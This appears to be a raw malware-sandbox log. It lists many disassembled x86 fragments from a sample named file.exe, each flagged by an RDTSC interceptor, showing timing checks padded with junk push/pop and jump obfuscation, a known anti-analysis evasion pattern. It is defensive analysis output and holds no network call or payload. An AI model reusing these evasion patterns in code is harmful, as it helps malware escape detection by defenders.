Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C75E second address: 127C77A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C77A second address: 127C7A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1DD4808486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c jne 00007F1DD4808488h 0x00000012 lea ebx, dword ptr [ebp+1245238Bh] 0x00000018 mov dword ptr [ebp+122D29DFh], esi 0x0000001e xchg eax, ebx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jns 00007F1DD4808486h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C8E3 second address: 127C905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C905 second address: 127C90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C90A second address: 127C910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C910 second address: 127C914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C914 second address: 127C928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126E9CC second address: 126E9DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F1DD4808486h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126E9DC second address: 126E9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126E9E0 second address: 126E9E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B5E1 second address: 129B5E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B72E second address: 129B74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1DD4808497h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B74F second address: 129B753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B753 second address: 129B759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B8D3 second address: 129B8E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F1DD489F596h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B8E1 second address: 129B8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BA70 second address: 129BA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BA74 second address: 129BA82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F1DD4808496h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BD41 second address: 129BD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1DD489F596h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BD4C second address: 129BD63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F1DD4808486h 0x00000009 jnl 00007F1DD4808486h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BD63 second address: 129BD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1DD489F5A3h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BD81 second address: 129BD8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1DD4808486h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129BEF9 second address: 129BEFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C1E3 second address: 129C21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1DD4808493h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1DD480848Ah 0x00000016 jmp 00007F1DD4808492h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C21E second address: 129C239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C239 second address: 129C23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C23D second address: 129C24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F59Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C39F second address: 129C3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1DD4808494h 0x0000000c jp 00007F1DD4808486h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C668 second address: 129C67A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126999E second address: 12699C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD4808491h 0x00000009 jmp 00007F1DD4808493h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12699C6 second address: 12699CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C9AD second address: 129C9B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129D1B8 second address: 129D1C2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1DD489F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129D1C2 second address: 129D1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F1DD4808486h 0x0000000e jmp 00007F1DD4808497h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129D31D second address: 129D327 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1DD489F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129D327 second address: 129D33C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1DD480848Ah 0x00000008 jns 00007F1DD4808486h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1264841 second address: 126485A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DD489F5A3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129FABA second address: 129FAC4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1DD4808486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A02C4 second address: 12A02C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A156C second address: 12A1570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A1570 second address: 12A157E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F1DD489F596h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A157E second address: 12A159F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD4808496h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A159F second address: 12A15A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A15A5 second address: 12A15AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A7DCD second address: 12A7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A7DD7 second address: 12A7DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A7DE0 second address: 12A7DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A842F second address: 12A8465 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1DD4808486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F1DD4808497h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1DD4808491h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A8465 second address: 12A8484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA56A second address: 12AA570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA570 second address: 12AA590 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1DD489F5A1h 0x00000008 jmp 00007F1DD489F59Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F1DD489F598h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA590 second address: 12AA5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD4808493h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA658 second address: 12AA663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA663 second address: 12AA6B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1DD4808486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnl 00007F1DD480849Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F1DD4808495h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA6B1 second address: 12AA70B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1DD489F598h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1DD489F598h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov si, 0D5Dh 0x0000002b or edi, dword ptr [ebp+122D2EFAh] 0x00000031 push C81F9FDDh 0x00000036 pushad 0x00000037 jmp 00007F1DD489F5A8h 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AACE2 second address: 12AACE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AACE6 second address: 12AACF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AACF4 second address: 12AACFE instructions: 0x00000000 rdtsc 0x00000002 je 00007F1DD4808486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AACFE second address: 12AAD08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1DD489F596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AADF5 second address: 12AADF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AADF9 second address: 12AAE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F1DD489F59Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AB3FB second address: 12AB3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AB3FF second address: 12AB405 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AD787 second address: 12AD7E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD4808498h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1DD4808496h 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 mov edi, esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F1DD4808488h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 push eax 0x00000031 push ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AD082 second address: 12AD088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AD7E5 second address: 12AD7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AE231 second address: 12AE239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AE239 second address: 12AE250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1DD4808486h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jl 00007F1DD4808486h 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AF53C second address: 12AF543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFF00 second address: 12AFF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F1DD4808486h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B09F3 second address: 12B09F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B09F7 second address: 12B09FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B38EA second address: 12B38F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B38F0 second address: 12B3966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D219Eh], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F1DD4808488h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov bx, di 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F1DD4808488h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a pushad 0x0000004b jc 00007F1DD480848Ch 0x00000051 xor ecx, 179124A4h 0x00000057 mov dword ptr [ebp+122D20DFh], esi 0x0000005d popad 0x0000005e add edi, 6D6BE5E1h 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 pop eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B3966 second address: 12B396B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B396B second address: 12B399B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1DD480848Ch 0x00000008 jmp 00007F1DD4808498h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B3B26 second address: 12B3B34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1DD489F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B3B34 second address: 12B3B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B4C27 second address: 12B4C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B5885 second address: 12B5889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B5889 second address: 12B5920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jmp 00007F1DD489F59Eh 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F1DD489F598h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov bh, 35h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F1DD489F598h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 jno 00007F1DD489F59Ah 0x00000056 xchg eax, esi 0x00000057 jnp 00007F1DD489F59Eh 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B7796 second address: 12B77B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1DD4808497h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B77B8 second address: 12B77BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B77BC second address: 12B77C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B77C2 second address: 12B77C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B77C8 second address: 12B77F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d mov edi, dword ptr [ebp+122D2B65h] 0x00000013 sbb ebx, 02603AEBh 0x00000019 xchg eax, esi 0x0000001a jmp 00007F1DD480848Bh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B77F3 second address: 12B77F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B86F1 second address: 12B870C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD4808497h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B87E4 second address: 12B87E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
